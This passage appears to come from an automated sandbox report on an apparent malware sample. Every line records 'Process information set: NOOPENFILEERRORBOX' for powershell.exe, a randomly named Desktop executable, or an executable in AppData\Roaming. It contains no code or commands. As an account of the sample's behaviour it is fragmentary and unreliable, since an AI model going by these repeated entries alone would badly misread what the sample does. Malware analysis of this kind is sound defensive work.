                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
